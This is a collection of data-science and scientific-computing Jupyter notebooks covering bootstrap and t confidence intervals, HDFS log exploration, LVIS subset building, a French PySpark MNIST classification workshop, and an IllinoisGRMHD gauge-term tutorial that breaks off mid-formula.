# 95% bootstrap percentile interval: the 2.5th to 97.5th percentile of replicates.
lower, upper = np.percentile(boot_2500, [2.5, 97.5])
print('95%% confidence interval: [%.2f, %.2f]' % (lower, upper))
# -
# #### From the original data (i.e., from a single sample):
# +
def confidence_interval(x, ci=0.95):
    """Two-sided t confidence interval for the population mean from sample x.

    Args:
        x (ndarray): 1-D sample of observations.
        ci (float): confidence level in (0, 1), e.g. 0.95 for a 95% interval.

    Returns:
        tuple: (lower, upper) bounds of the confidence interval.
    """
    x_mean = np.mean(x)
    # Standard error of the mean (ddof=1 -> sample standard deviation).
    se = np.std(x, ddof=1) / np.sqrt(x.shape[0])
    # Fixes two defects of the original: it called the private, unchecked
    # scipy.stats.t._ppf, and it used n degrees of freedom where a
    # t-interval on the mean requires n - 1.
    h = se * scipy.stats.t.ppf((1 + ci) / 2., x.shape[0] - 1)
    return x_mean - h, x_mean + h
# t-based confidence interval computed from the single original sample.
lower, upper = confidence_interval(x, ci=0.95)
print('95%% confidence interval: [%.2f, %.2f]' % (lower, upper))
# +
# Normal-approximation confidence interval for the mean.
se = np.std(x, ddof=1) / np.sqrt(x.shape[0])
# Pass the confidence level positionally: SciPy renamed this keyword from
# `alpha` to `confidence` in SciPy 1.9, so a positional argument works on
# both old and new versions.
lower, upper = scipy.stats.norm.interval(0.95,
                                         loc=np.mean(x),
                                         scale=se)
print('95%% confidence interval: [%.2f, %.2f]' % (lower, upper))
|
code/bootstrapping.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import re
import pandas as pd
import os
# NOTE(review): hard-coded absolute path — only works on the author's machine;
# consider a relative path or a configuration variable.
os.chdir("/Volumes/UBC/Block6/586-AdvanceMachineLearning/project/machinelearningproject")
# Run this cell to ensure that altair plots show up in the exported HTML
# and that the R cell magic works
import altair as alt
# Save a vega-lite spec and a PNG blob for each plot in the notebook
alt.renderers.enable('mimetype')
# Handle large data sets without embedding them in the notebook
alt.data_transformers.enable('data_server')
# -
# Load the structured (parsed) HDFS log sample.
parsed_data = pd.read_csv("data/processed_data/HDFS/HDFS_2k_structured.csv")
# Quick structural overview of the parsed log data.
parsed_data.head()
parsed_data.tail()
parsed_data.info()
parsed_data.describe()
# Histogram of log events by time of day (up to 24 bins ~ one per hour).
alt.Chart(parsed_data).mark_bar().encode(
    x=alt.X('Time', bin=alt.Bin(maxbins=24)),
    y='count()'
).properties(
    height=100
)
# Line chart: number of log events per date.
(alt.Chart(parsed_data)
 .mark_line().encode(
    alt.X('Date'),
    y = 'count()',
 ).properties(
    height=300, width = 500
 ))
# Bar chart: event counts per Tag.
alt.Chart(parsed_data).mark_bar().encode(
    x=alt.X('Tag'),
    y='count()',
    color = "Tag").properties(
    height=300, width = 500
)
# Bar chart: event counts per log Level.
alt.Chart(parsed_data).mark_bar().encode(
    x=alt.X('Level'),
    y = 'count()',
    color = "Level").properties(
    height=200, width = 100
)
# Scatter: which process IDs (PID) are active on which dates.
alt.Chart(parsed_data).mark_point().encode(
    x= alt.X('Date'),
    y = alt.Y('PID'),
    color = "Date").properties(
    height=100, width = 500
)
# Scatter: which components log on which dates.
alt.Chart(parsed_data).mark_point().encode(
    x= alt.X('Date'),
    y = alt.Y('Component'),
    color = "Component").properties(
    height=100, width = 500
)
|
data/eda_code/EDA1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: maskrcnn_benchmark
# language: python
# name: maskrcnn_benchmark
# ---
import os, sys
import argparse
import numpy as np
from collections import defaultdict
import json
import time
import multiprocessing
import copy
import os.path as osp
# from utils import IdGenerator, id2rgb
import pdb
import torch
try:
import PIL.Image as Image
except:
print("Failed to import the image processing packages.")
sys.exit(-1)
from pycocotools.coco import COCO
import numpy as np
# import skimage.io as io
import pylab
# Dataset split and class-subset configuration.
stage='val'
b = 110    # number of "base" (top) classes to keep in the subset
step = 160  # presumably classes added per incremental step — TODO confirm
save_path = './datasets/lvis/lvis_trainval_1230'
inst_gt_json_file = "./datasets/lvis/lvis_v0.5_"+stage+".json"
data_path = './datasets/lvis/images/'+stage+'2017'
# Load the full LVIS v0.5 instance ground-truth annotations.
with open(inst_gt_json_file, 'r') as f:
    inst_gt = json.load(f)
# Load the pre-sorted class id list (sorting criterion defined by the script
# that produced lvis_sorted_id_all.json — verify upstream).
sorted_cls_id_file = os.path.join(save_path, 'lvis_sorted_id_all.json')
with open(sorted_cls_id_file, 'r') as f:
    sorted_cls_id = json.load(f)
# Persist the ids of the top-b classes.
sorted_class_ids_top_b = sorted_cls_id[:b]
json.dump(sorted_class_ids_top_b, open(os.path.join(save_path, 'lvis_sorted_id_top'+str(b)+'.json'), 'w'))
# +
import torch
import torchvision
min_keypoints_per_image = 10
def _count_visible_keypoints(anno):
return sum(sum(1 for v in ann["keypoints"][2::3] if v > 0) for ann in anno)
def _has_only_empty_bbox(anno):
return all(any(o <= 1 for o in obj["bbox"][2:]) for obj in anno)
def has_valid_annotation(anno):
    """Decide whether an image's annotation list is usable for training."""
    # No annotations at all -> invalid.
    if len(anno) == 0:
        return False
    # Every box degenerate (near-zero area) -> effectively no annotation.
    if _has_only_empty_bbox(anno):
        return False
    # Non-keypoint tasks only need valid boxes.
    if "keypoints" not in anno[0]:
        return True
    # Keypoint tasks additionally require enough visible keypoints
    # across the whole image.
    return _count_visible_keypoints(anno) >= min_keypoints_per_image
class COCODataset(torchvision.datasets.coco.CocoDetection):
    """CocoDetection wrapper that can drop images lacking valid annotations.

    Filtering delegates to has_valid_annotation(), so images whose boxes are
    all degenerate (and, for keypoint annotations, images with too few
    visible keypoints) are removed when remove_images_without_annotations
    is True.
    """

    def __init__(self, root, ann_file, remove_images_without_annotations=False):
        super(COCODataset, self).__init__(root, ann_file)
        # Sort ids for a deterministic ordering across runs.
        self.ids = sorted(self.ids)
        # filter images without detection annotations
        if remove_images_without_annotations:
            ids = []
            for img_id in self.ids:
                # ann_ids = self.coco.getAnnIds(imgIds=img_id, catIds = id_gt,iscrowd=None)
                ann_ids = self.coco.getAnnIds(imgIds=img_id, iscrowd=None)
                anno = self.coco.loadAnns(ann_ids)
                if has_valid_annotation(anno):
                    ids.append(img_id)
            self.ids = ids
        # Map category id -> human-readable category name.
        self.categories = {cat['id']: cat['name'] for cat in self.coco.cats.values()}
        # self.json_category_id_to_contiguous_id = {
        #     v: i + 1 for i, v in enumerate(self.coco.getCatIds())
        # }
        # self.contiguous_category_id_to_json_id = {
        #     v: k for k, v in self.json_category_id_to_contiguous_id.items()
        # }
        # Map contiguous dataset index -> original COCO image id.
        self.id_to_img_map = {k: v for k, v in enumerate(self.ids)}
        # self._transforms = transforms

    def __getitem__(self, idx):
        # Return the raw (image, annotation list) pair; no transforms applied.
        img, anno = super(COCODataset, self).__getitem__(idx)
        return img, anno

    def get_img_info(self, index):
        """Return the COCO image metadata dict for the given dataset index."""
        img_id = self.id_to_img_map[index]
        img_data = self.coco.imgs[img_id]
        return img_data
# Instantiate the dataset, dropping images without valid annotations.
coco = COCODataset(data_path,inst_gt_json_file, True)
# +
# Build a small subset dataset containing all annotations of only the
# top-b classes.  (Translated from the original Chinese comment.)
inst_gt_subset = inst_gt.copy()
annotations_subset = []
for class_i in sorted_class_ids_top_b:
    ann_list = coco.coco.getAnnIds(catIds=class_i)
    annotations_subset.extend(coco.coco.loadAnns(ids=ann_list))
inst_gt_subset['annotations'] = annotations_subset
json.dump(inst_gt_subset, open(os.path.join(save_path, 'lvis_v0.5_'+stage+'_top'+str(b)+'.json'), 'w'))
# +
# For the validation split, tag each category with the incremental step in
# which it appears: 'b0' = base classes, 't0'/'t1' = later steps.
# NOTE(review): 270 looks like b + step (110 + 160) — confirm, and consider
# writing it as b + step so the split boundaries stay in sync with config.
if stage == 'val':
    for i in inst_gt_subset['categories']:
        if i['id'] in sorted_cls_id[:b]:
            i['step_state'] = 'b0'
        elif i['id'] in sorted_cls_id[b:270+160]:
            i['step_state'] = 't0'
        else:
            i['step_state'] = 't1'
    json.dump(inst_gt_subset, open(os.path.join(save_path, 'lvis_v0.5_'+stage+'_top'+str(b)+'.json'), 'w'))
# -
|
train_top_b.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: PySpark
# language: python
# name: pyspark
# ---
# <center>
# <a href="http://www.insa-toulouse.fr/" ><img src="http://www.math.univ-toulouse.fr/~besse/Wikistat/Images/logo-insa.jpg" style="float:left; max-width: 120px; display: inline" alt="INSA"/></a>
#
# <a href="http://wikistat.fr/" ><img src="http://www.math.univ-toulouse.fr/~besse/Wikistat/Images/wikistat.jpg" style="max-width: 250px; display: inline" alt="Wikistat"/></a>
#
# <a href="http://www.math.univ-toulouse.fr/" ><img src="http://www.math.univ-toulouse.fr/~besse/Wikistat/Images/logo_imt.jpg" style="float:right; max-width: 200px; display: inline" alt="IMT"/> </a>
# </center>
# # [Ateliers: Technologies des grosses data](https://github.com/wikistat/Ateliers-Big-Data)
# # [Reconnaissance de caractères manuscrits](https://github.com/wikistat/Ateliers-Big-Data/2-MNIST) ([MNIST](http://yann.lecun.com/exdb/mnist/)) avec <a href="http://spark.apache.org/"><img src="http://spark.apache.org/images/spark-logo-trademark.png" style="max-width: 100px; display: inline" alt="Spark"/> </a>
# #### Résumé
# Présentation du problème de reconnaissance de caractères manuscrits ([MNIST DataBase](http://yann.lecun.com/exdb/mnist/) à partir d’images numérisées. L’objectif est de comparer les performances (qualité de prévision, temps d'exécution) en fonction de la technologie, ici Spark et la librairie MLlib, et en fonction de la taille de l'échantillon. La principale limitation de Spark concerne la mémoire; répartie sur chaque noeud elle est vite insuffisante lorsque des grands modèles (beaucoup d'arbres d'une forêt aléatoire) doivent être archivés sur chacun de ceux-ci.
# ## 1 Introduction
# ### 1.1 Objetif
# L'objectif général est la construction d'un meilleur modèle de reconnaissance de chiffres manuscrits. Ce problème est ancien (zipcodes) et sert souvent de base pour la comparaison de méthodes et d'algorithmes d'apprentissage. Le site de Yann LeCun: [MNIST](http://yann.lecun.com/exdb/mnist/) DataBase, est à la source des données étudiées, il décrit précisément le problème et les modes d'acquisition. Il tenait à jour la liste des publications proposant des solutions avec la qualité de prévision obtenue. Ce problème a également été proposé comme sujet d'un concours [Kaggle](https://www.kaggle.com/competitions) mais sur un sous-ensemble des données.
#
# De façon très schématique, plusieurs stratégies sont développées dans une vaste littérature sur ces données.
#
# - Utiliser une méthode classique (k-nn, random forest...) sans trop raffiner mais avec des temps d'apprentissage rapide conduit à un taux d'erreur autour de 3\%.
# * Ajouter ou intégrer un pré-traitement des données permettant de recaler les images par des distorsions plus ou moins complexes.
# * Construire une mesure de distance adaptée au problème, par exemple invariante par rotation, translation, puis l'intégrer dans une technique d'apprentissage classique comme les $k$ plus proches voisins.
# * Utiliser une méthode plus flexibles (réseau de neurones épais) avec une optimisation fine des paramètres.
#
# L'objectif de cet atelier est de comparer sur des données relativement volumineuses les performances de différents environnements technologiques et librairies. Une dernière question est abordée, elle concerne l'influence de la taille de l'échantillon d'apprentissage sur le temps d'exécution ainsi que sur la qualité des prévisions.
#
#
# Analyse des données avec Spark, noter les temps d'exécution, la précision estimée sur l'échantillon test.
#
# ### 1.2 Lecture des données d'apprentissage et de test
# Les données peuvent être préalablement téléchargées ou directement lues. Ce sont celles originales du site [MNIST DataBase](http://yann.lecun.com/exdb/mnist/) mais préalablement converties au format .csv, certes plus volumineux mais plus facile à lire. Attention le fichier `mnist_train.zip` présent dans le dépôt est compressé.
sc
# Importation des packages
import time
from numpy import array
# Répertoire courant ou répertoire accessible de tous les "workers" du cluster
DATA_PATH=""
# ## Gestion des données
# ### Importation et transformation des données au format RDD
# Les données sont déjà partagée en une partie apprentissage et une test utilisée pour les comparaisons entre méthodes dans les publications. Ce sont bien les données du site MNIST mais transformée au format .csv pour en faciliter la lecture.
#
# Elles doivent être stockées à un emplacement accessibles de tous les noeuds du cluster pour permettre la construction de la base de données réparties (RDD).
#
# Dans une utilisation monoposte (*standalone*) de *Spark*, elles sont simplement chargées dans le répertoire courant.
# Download the train/test CSV versions of MNIST next to the notebook (or to a
# location visible to every Spark worker when running on a cluster).
import urllib.request
f = urllib.request.urlretrieve("https://www.math.univ-toulouse.fr/~besse/Wikistat/data/mnist_train.csv",DATA_PATH+"mnist_train.csv")
f = urllib.request.urlretrieve("https://www.math.univ-toulouse.fr/~besse/Wikistat/data/mnist_test.csv",DATA_PATH+"mnist_test.csv")
# Turn the text file into an RDD of float lists (784 pixels + label).
## Training data
# Map step: split each CSV line on commas and convert to floats.
trainRDD = sc.textFile(DATA_PATH+"mnist_train.csv").map(lambda l: [float(x) for x in l.split(',')])
# Action: triggers the computation and returns the sample size.
trainRDD.count()
#test
# ### Conversion des données au format DataFrame
#
# Pour pouvoir être intérprété par les différentes méthodes de classification de la librairie SparkML, les données doivent être converties en objet DataFrame.
#
# Pour plus d'information sur l'utilisation de ces DataFrames, reportez vous aux calepins 1-Intro-PySpark/Cal3-PySpark-SQL.ipynb et 1-Intro-PySpark/Cal4-PySpark-Statelem&Pipeline-SparkML.ipynb
# +
# Transformation du de la RDD en DataFrame
from pyspark.sql import Row
from pyspark.ml.linalg import Vectors
#Cette fonction va permettre de transformer chaque ligne de la RDD en une "Row" pyspark.sql.
def list_to_Row(l):
    """Convert one CSV record (784 pixel values followed by the label)
    into a pyspark.sql Row with a sparse feature vector.

    Zero-valued pixels are omitted from the sparse representation.
    """
    nonzero_pixels = {i: v for i, v in enumerate(l[:-1]) if v != 0}
    features = Vectors.sparse(784, nonzero_pixels)
    return Row(label=l[-1], features=features)
# Convert the training RDD into a DataFrame of (label, sparse features) rows.
trainDF = trainRDD.map(list_to_Row).toDF()
# -
# Example of a single converted row
trainDF.take(1)[0]
## Same conversion for the test data
testRDD = sc.textFile(DATA_PATH+'mnist_test.csv').map(lambda l: [float(x) for x in l.split(',')])
testRDD.count() # sample size (action: triggers the computation)
testDF = testRDD.map(list_to_Row).toDF()
testDF.take(1)
# ### Sous-échantillon d'apprentissage
# Extraction d'un sous-échantillon d'apprentissage pour tester les programmes sur des données plus petites. Itérer cette démarche permet d'étudier l'évolution de l'erreur de prévision en fonction de la taille de l'échantillon d'apprentissage.
# Fraction of the training data kept; raise it to study how error and run
# time evolve with the training-set size.
tauxEch=0.1 # try increasingly large training-sample fractions
(trainData, DropDatal) = trainRDD.randomSplit([tauxEch, 1-tauxEch])
trainData.count()
# ## Méthode de classification
#
# Les méthodes de classifications de la librairie SparkML suivent le même shéma d'utilisation.
#
# Il faut dans un premier temps crée un objets **Estimators** pour configurer les paramètres de la méthode.
# Dans un second temps on réalise l'apprentissage en appliquant la fonction **fit** de l'Estimators sur la DataFrame d'apprentissage. Cette commande créé un objet différent, le **Transformers** qui permettra de réaliser les prédictions.
#
# Par défaut les différentes méthodes considère que les noms des colonnes correspondants aux variables et au prédicants du jeux d'apprentissage sont respectivement "features" et "label". Tandis que les prédictions seront automatiquement assigné à une colonne de nom "prediction".
# Il est conseillé de garder cette terminiologie, mais ces attributs par défaut peuvent être modifié en spécifiant les paramètres *featuresCol*, *labelCol* et *predictionCol* de chaque méthode.
# ### Régression logistique
# Exemple d'utilisation pour expliciter la syntaxe mais sans grand intérêt pour ces données qui ne satisfont pas à des frontières de discrimination linéaires. L'algorithme permettant de réaliser une regression logistique multinomial est l'algorithme [*softmax*](https://spark.apache.org/docs/latest/ml-classification-regression.html#multinomial-logistic-regression).
# +
### Logistic Regression
from pyspark.ml.classification import LogisticRegression
### Configure the estimator (multinomial softmax regression)
time_start=time.time()
lr = LogisticRegression(maxIter=100, regParam=0.01, fitIntercept=False, tol=0.0001,
                        family = "multinomial", elasticNetParam=0.0) #0 for L2 penalty, 1 for L1 penalty
### Fit the model and time the training
model_lr = lr.fit(trainDF)
time_end=time.time()
time_lrm=(time_end - time_start)
print("LR prend %d s" %(time_lrm)) # (104 s with taux=1)
# -
# #### Test-set error
# Score the held-out test set and compute the misclassification rate.
predictionsRDD = model_lr.transform(testDF)
labelsAndPredictions = predictionsRDD.select("label","prediction").collect()
nb_good_prediction = sum([r[0]==r[1] for r in labelsAndPredictions])
nb_test = testDF.count()
testErr = 1-nb_good_prediction/nb_test
print('Test Error = ' + str(testErr)) # (0.08 with taux=1)
# LogisticRegressionTrainingSummary provides a summary for a LogisticRegressionModel. Currently, only binary classification is supported. Support for multiclass model summaries will be added in the future.
# ### Arbre binaire de décision
# Même chose pour un arbre de discrimination. Comme pour l'implémentation de scikit-learn, les arbres ne peuvent être optimisés par un élagage basé sur une pénalisation de la complexité. Ce paramètre n'est pas présent, seule la profondeur max ou le nombre minimal d'observations par feuille peut contrôler la complexité. Noter l'apparition d'un nouveau paramètre: *maxBins* qui, schématiquement, rend qualitative ordinale à maxBins classes toute variable quantitative. D'autre part, il n'y a pas de représentation graphique. Cette implémentation d'arbre est issue d'un [projet Google](http://static.googleusercontent.com/media/research.google.com/fr//pubs/archive/36296.pdf) pour adapter cet algorithme aux contraintes *mapreduce* de données sous Hadoop. Elle vaut surtout pour permettre de construire une implémentation des forêts aléatoires.
# +
### Decision Tree
from pyspark.ml.classification import DecisionTreeClassifier

### Set up the method's hyper-parameters
t0 = time.time()
dt = DecisionTreeClassifier(
    impurity='gini',
    maxDepth=5,
    maxBins=32,
    minInstancesPerNode=1,
    minInfoGain=0.0,
)
### Fit the model on the training DataFrame
model_dt = dt.fit(trainDF)
time_dt = time.time() - t0
print("DT takes %d s" %(time_dt))
# -
# #### Erreur sur l'échantillon test
# Evaluate the fitted decision tree on the held-out test set.
predictionsRDD = model_dt.transform(testDF)
labelsAndPredictions = predictionsRDD.select("label", "prediction").collect()
# Count rows whose prediction matches the true label.
nb_good_prediction = sum(1 for row in labelsAndPredictions if row[0] == row[1])
nb_test = testDF.count()
testErr = 1 - nb_good_prediction / nb_test
print('Test Error = ' + str(testErr))
# ### Random Forest
# Les $k$-nn ne sont pas "scalables" et donc pas présents. Voici la syntaxe et les paramètres associés à l'algorithme des forêts aléatoires. Parmi ceux "classiques" se trouvent *numTrees*, *featureSubsetStrategy*, *impurity*, *maxDepth* et en plus *maxBins* comme pour les arbres. La valeur du paramètre *maxDepth* est critique pour la qualité de la prévision. En principe, il n'est pas contraint, un arbre peut se déployer sans "limite" mais face à des données massives cela peut provoquer des plantages intempestifs.
# +
### Random Forest
from pyspark.ml.classification import RandomForestClassifier

### Set up the method's hyper-parameters
t0 = time.time()
rf = RandomForestClassifier(
    numTrees=2,
    impurity='gini',
    maxDepth=12,
    maxBins=32,
    seed=None,
)
### Fit the model on the training DataFrame
model_rf = rf.fit(trainDF)
time_rf = time.time() - t0
print("RF takes %d s" %(time_rf))
# -
# #### Erreur sur l'échantillon test
# Erreur sur l'échantillon test
# Evaluate the fitted random forest on the held-out test set.
predictionsRDD = model_rf.transform(testDF)
labelsAndPredictions = predictionsRDD.select("label", "prediction").collect()
# Count rows whose prediction matches the true label.
nb_good_prediction = sum(1 for row in labelsAndPredictions if row[0] == row[1])
nb_test = testDF.count()
testErr = 1 - nb_good_prediction / nb_test
print('Test Error = ' + str(testErr))
# Même traitement sur la totalité de l'échantillon
# ## 3 Quelques résultats
# 100 arbres, sélection automatique, maxDepth=9
#
# maxBins | Temps | Erreur
# --------|-------|---------
# 32 | 259 | 0.067
# 64 | 264 | 0.068
# 128 | 490 | 0.065
#
# 100 arbres, sélection automatique, maxBins=32
#
# maxDepth | Temps | Erreur
# ---------|-------|-------
# 4 | 55 | 0.21
# 9 | 259 | 0.067
# 18 | 983 | **0.035**
#
# Le nombre de variables tirées à chaque noeud n'a pas été optimisé.
#
# Le paramètre maxBins ne semble pas trop influencer la précision du modèle, au contraire de la profondeur maximum des arbres. Avec une profondeur suffisante, on retrouve (presque) les résultats classiques des forêts aléatoires sur ces données.
#
# Comparer les résultats obtenus pour les trois environnements.
|
MNIST/Atelier-pyspark-MNIST.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <script async src="https://www.googletagmanager.com/gtag/js?id=UA-59152712-8"></script>
# <script>
# window.dataLayer = window.dataLayer || [];
# function gtag(){dataLayer.push(arguments);}
# gtag('js', new Date());
#
# gtag('config', 'UA-59152712-8');
# </script>
#
# # Tutorial-IllinoisGRMHD: Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
#
# ## Authors: <NAME> & <NAME>
#
# <font color='red'>**This module is currently under development**</font>
#
# ## In this tutorial module we explain the construction of the right-hand side of the evolution equations of $\left[\sqrt{\gamma}\Phi\right]$ and add gauge terms to the right-hand side of the evolution equations of $A_{i}$
#
# ### Required and recommended citations:
#
# * **(Required)** <NAME>., <NAME>., <NAME>., <NAME>., and <NAME>. IllinoisGRMHD: an open-source, user-friendly GRMHD code for dynamical spacetimes. Class. Quantum Grav. 32 (2015) 175009. ([arxiv:1501.07276](http://arxiv.org/abs/1501.07276)).
# * **(Required)** <NAME>., <NAME>., <NAME>., <NAME>. Primitive Variable Solvers for Conservative General Relativistic Magnetohydrodynamics. Astrophysical Journal, 641, 626 (2006) ([astro-ph/0512420](https://arxiv.org/abs/astro-ph/0512420)).
# * **(Recommended)** <NAME>., <NAME>., <NAME>. An efficient shock-capturing central-type scheme for multidimensional relativistic flows - II. Magnetohydrodynamics. A&A 400 (2) 397-413 (2003). DOI: 10.1051/0004-6361:20021641 ([astro-ph/0210618](https://arxiv.org/abs/astro-ph/0210618)).
#
# If using the version of `IllinoisGRMHD` with piecewise polytropic *or* tabulated (coming soon!) EOS support, then the following citation is also required:
#
# * **(Required)** <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., and <NAME>., *IllinoisGRMHD github repository* (2019). Source Code URL: https://github.com/zachetienne/nrpytutorial/tree/master/IllinoisGRMHD/.
# <a id='toc'></a>
#
# # Table of Contents
# $$\label{toc}$$
#
# This module is organized as follows
#
# 0. [Step 0](#src_dir): **Source directory creation**
# 1. [Step 1](#lorenz_psi6phi_rhs__add_gauge_terms_to_a_i_rhs__c): **`Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C`**
# 1. [Step 1.a](#interpolations): *Performing all necessary interpolations*
# 1. [Step 1.a.i](#interpolation_algorithm): The interpolation algorithm
# 1. [Step 1.a.ii](#interp_and_alpha_phi_minus_betaj_A_j): Interpolating gridfunctions and computing $\left(\alpha\Phi-\beta^{j}A_{j}\right)$
# 1. [Step 1.b](#partial_t_a_i_gauge): *Computing $\partial_{t}A_{i}^{\rm gauge}$*
# 1. [Step 1.c](#shift_advection_terms): *Computing $\partial_{j}\beta^{j}\left[\sqrt{\gamma}\Phi\right]$*
# 1. [Step 1.d](#partial_j_alpha_psi6_aj): *Computing $-\partial_{j}\left(\alpha\sqrt{\gamma}A^{j}\right)-\xi\alpha\left[\sqrt{\gamma}\Phi\right]$*
# 1. [Step 1.e](#fct_avg): *The `avg()` function*
# 1. [Step 2](#code_validation): **Code validation**
# 1. [Step 3](#latex_pdf_output): **Output this notebook to $\LaTeX$-formatted PDF file**
# <a id='src_dir'></a>
#
# # Step 0: Source directory creation \[Back to [top](#toc)\]
# $$\label{src_dir}$$
#
# We will now use the [cmdline_helper.py NRPy+ module](Tutorial-Tutorial-cmdline_helper.ipynb) to create the source directory within the `IllinoisGRMHD` NRPy+ directory, if it does not exist yet.
# +
# Step 0: Creation of the IllinoisGRMHD source directory
# Step 0a: Add NRPy's directory to the path
# https://stackoverflow.com/questions/16780014/import-file-from-parent-directory
import os,sys
nrpy_dir_path = os.path.join("..","..")
if nrpy_dir_path not in sys.path:
sys.path.append(nrpy_dir_path)
# Step 0b: Load up cmdline_helper and create the directory
import cmdline_helper as cmd
outdir = os.path.join("..","src")
cmd.mkdir(outdir)
# -
# <a id='lorenz_psi6phi_rhs__add_gauge_terms_to_a_i_rhs__c'></a>
#
# # Step 1: The `Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C` file \[Back to [top](#toc)\]
# $$\label{lorenz_psi6phi_rhs__add_gauge_terms_to_a_i_rhs__c}$$
#
# In the `Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C` file we compute the gauge terms in $\partial_{t}A_{i}$, as well as the right-hand side of $\left[\sqrt{\gamma}\Phi\right]$, according to equations (16) and (17) of [Etienne *et al*.](https://arxiv.org/pdf/1501.07276.pdf):
#
# $$
# \begin{align}
# \partial_{t}A_{i}^{\rm gauge} &\equiv \partial_{t}A_{i} - \epsilon_{ijk}v^{j}\tilde{B}^{k} = -\partial_{i}\left(\alpha\Phi-\beta^{j}A_{j}\right)\ ,\\
# \partial_{t}\left[\sqrt{\gamma}\Phi\right] &= -\partial_{j}\left(\alpha\sqrt{\gamma}A^{j} - \beta^{j}\left[\sqrt{\gamma}\Phi\right]\right) - \xi\alpha\left[\sqrt{\gamma}\Phi\right]\ .
# \end{align}
# $$
# +
# %%writefile $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
// Forward declaration: average of f[k][j][i] over an inclusive index sub-box
// (implementation appended at the bottom of this generated file).
static inline CCTK_REAL avg(CCTK_REAL f[PLUS2+1][PLUS2+1][PLUS2+1],int imin,int imax, int jmin,int jmax, int kmin,int kmax);
// Driver for the Lorenz-gauge terms: fills psi6phi_rhs and adds the gauge
// contribution -\partial_i(\alpha\Phi - \beta^j A_j) to Ax_rhs/Ay_rhs/Az_rhs.
// in_vars[] holds the input gridfunctions, indexed by the INTERP_* constants
// used below; the *_interp/*_iphjphkph arrays are scratch output gridfunctions.
static void Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs(const cGH *cctkGH,const int *cctk_lsh,const int *cctk_nghostzones,CCTK_REAL *dX,CCTK_REAL **in_vars,CCTK_REAL *psi6phi,
CCTK_REAL *shiftx_iphjphkph,CCTK_REAL *shifty_iphjphkph,CCTK_REAL *shiftz_iphjphkph,
CCTK_REAL *alpha_iphjphkph,CCTK_REAL *alpha_Phi_minus_betaj_A_j_iphjphkph,CCTK_REAL *alpha_sqrtg_Ax_interp,
CCTK_REAL *alpha_sqrtg_Ay_interp,CCTK_REAL *alpha_sqrtg_Az_interp,
CCTK_REAL *psi6phi_rhs,CCTK_REAL *Ax_rhs,CCTK_REAL *Ay_rhs,CCTK_REAL *Az_rhs) {
DECLARE_CCTK_PARAMETERS;
/* Compute \partial_t psi6phi = -\partial_i ( \alpha psi^6 A^i - psi6phi \beta^i)
* (Eq 13 of http://arxiv.org/pdf/1110.4633.pdf), using Lorenz gauge.
* Note that the RHS consists of a shift advection term on psi6phi and
* a term depending on the vector potential.
* psi6phi is defined at (i+1/2,j+1/2,k+1/2), but instead of reconstructing
* to compute the RHS of \partial_t psi6phi, we instead use standard
* interpolations.
*/
// Precompute inverse grid spacings, used by all finite differences below.
CCTK_REAL dXm1=1.0/dX[0];
CCTK_REAL dYm1=1.0/dX[1];
CCTK_REAL dZm1=1.0/dX[2];
# -
# <a id='interpolations'></a>
#
# ## Step 1.a: Performing all necessary interpolations \[Back to [top](#toc)\]
# $$\label{interpolations}$$
# <a id='interpolation_algorithm'></a>
#
# ### Step 1.a.i: The interpolation algorithm \[Back to [top](#toc)\]
# $$\label{interpolation_algorithm}$$
#
# It is important to notice the different staggerings. We are ultimately interested in the RHS of $\left[\sqrt{\gamma}\Phi\right]_{i,j,k}=\left[\psi^{6}\Phi\right]_{i,j,k}$, which is actually located at $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$. Remember the staggerings:
#
# | Quantity | Actual location on the grid |
# |:--------------------------------------:|:------------------------------------------------------:|
# | $\alpha_{i,j,k}$ | $\left(i,j,k\right)$ |
# | $\psi^{6}_{i,j,k}$ | $\left(i,j,k\right)$ |
# | $\left(A_{x}\right)_{i,j,k}$ | $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$ |
# | $\left(A_{y}\right)_{i,j,k}$ | $\left(i+\frac{1}{2},j,k+\frac{1}{2}\right)$ |
# | $\left(A_{z}\right)_{i,j,k}$ | $\left(i+\frac{1}{2},j+\frac{1}{2},k\right)$ |
# |$\left[\sqrt{\gamma}\Phi\right]_{i,j,k}$|$\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$|
#
# To obtain the staggerings we use an interpolation routine which averages the value of the gridfunctions around the point of interest. For metric quantities, such as $\alpha$ and $\psi$, it is very easy to understand what is happening, so we will use them as our main example.
#
# Because we are solving the equations in 3 spatial dimensions, our numerical grid can be seen as a collection of small "cubes" whose sizes are $\left(dx,dy,dz\right)$ (notice that, while we could have $dx\neq dy\neq dz$, we will refer to the grid as cubes to make it easier to describe it). Then, the metric quantities, which are unstaggered, are defined on the *vertices* of the cubes. On the other hand, $\left[\sqrt{\gamma}\Phi\right]$ is defined at the *centers* of the cubes. Thus, to obtain metric quantities on the center of the cube, we use an *averaging interpolation algorithm* which uses all 8 vertices of the cube.
#
# As a concrete example, we obtain the lapse at the grid location $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$ by averaging
#
# $$
# \alpha_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} =
# \frac{
# \alpha_{i,j,k}+
# \alpha_{i+1,j,k}+
# \alpha_{i,j+1,k}+
# \alpha_{i,j,k+1}+
# \alpha_{i+1,j+1,k}+
# \alpha_{i+1,j,k+1}+
# \alpha_{i,j+1,k+1}+
